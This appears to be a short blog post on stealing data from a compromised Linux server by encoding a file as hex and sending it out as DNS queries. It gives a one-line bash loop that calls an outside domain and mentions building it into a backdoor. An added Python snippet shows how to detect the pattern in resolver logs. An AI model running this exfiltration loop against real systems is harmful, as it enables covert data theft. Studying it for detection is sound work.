Exfiltrating Data Via DNS Requests | Hack all things

In this installment of Hack All The Things we will be discussing how to leverage DNS requests to exfiltrate data from a server. Note that while this is done on a Linux “victim”, the same can be done in Windows using VBScript, PowerShell, and even the fairly limited cmd.exe command prompt.

This is a very simple way to exfil data via a DNS request. It might be discovered by some monitoring software, but it's so simple that it's a good trick to have as a last resort.

The simple BASH script:

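# One DNS lookup per whitespace-separated chunk of exfilMe.hex; the chunk becomes the leftmost label
for merp in $(cat exfilMe.hex); do dig "$merp.exfil.hacktalk.net"; done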
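What the monitoring mentioned above can key on, as an added example that is not code from the original post: the loop leaves many distinct hex-only leftmost labels under one parent zone from one client. The log format ("client qname" per line), the threshold, and all names below are assumptions, and the sample log is constructed.

```python
import re
from collections import defaultdict

# Constructed sample resolver log, one "<client> <qname>" pair per line (assumed format).
SAMPLE_LOG = """\
10.0.0.5 www.example.com
10.0.0.7 4d5a90000300.exfil.example.net
10.0.0.7 00000400ffff.exfil.example.net
10.0.0.5 deadbeef.example.org
10.0.0.7 0000b8000000.exfil.example.net
10.0.0.7 000040000000.exfil.example.net
10.0.0.5 mail.example.com
10.0.0.7 4d5a90000300.exfil.example.net
"""

# Leftmost label made only of hex byte pairs, at least 4 bytes long.
HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){4,}$")


def find_hex_label_bursts(log_text, min_unique=3):
    """Return {(client, parent_zone): (unique_labels, decoded_bytes)} for
    clients that sent at least `min_unique` distinct hex labels to one zone."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue  # skip malformed lines
        client, qname = parts
        # Split "chunk.parent.zone" into the data-carrying label and its parent.
        label, _, parent = qname.rstrip(".").lower().partition(".")
        if parent and HEX_LABEL.match(label):
            seen[(client, parent)].add(label)

    findings = {}
    for key, labels in seen.items():
        if len(labels) >= min_unique:
            # Two hex characters encode one byte of payload.
            findings[key] = (len(labels), sum(len(l) // 2 for l in labels))
    return findings


if __name__ == "__main__":
    for (client, zone), (count, size) in find_hex_label_bursts(SAMPLE_LOG).items():
        print(f"{client} -> {zone}: {count} unique hex labels, ~{size} bytes")
```

A single hex-looking name such as the constructed `deadbeef.example.org` stays below the threshold, so the rule fires on the burst pattern rather than on any one query.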

We've been using a similar approach; however, we coded the DNS exfil command into our own backdoor code.

A full post on the importance of data exfil is coming tomorrow.
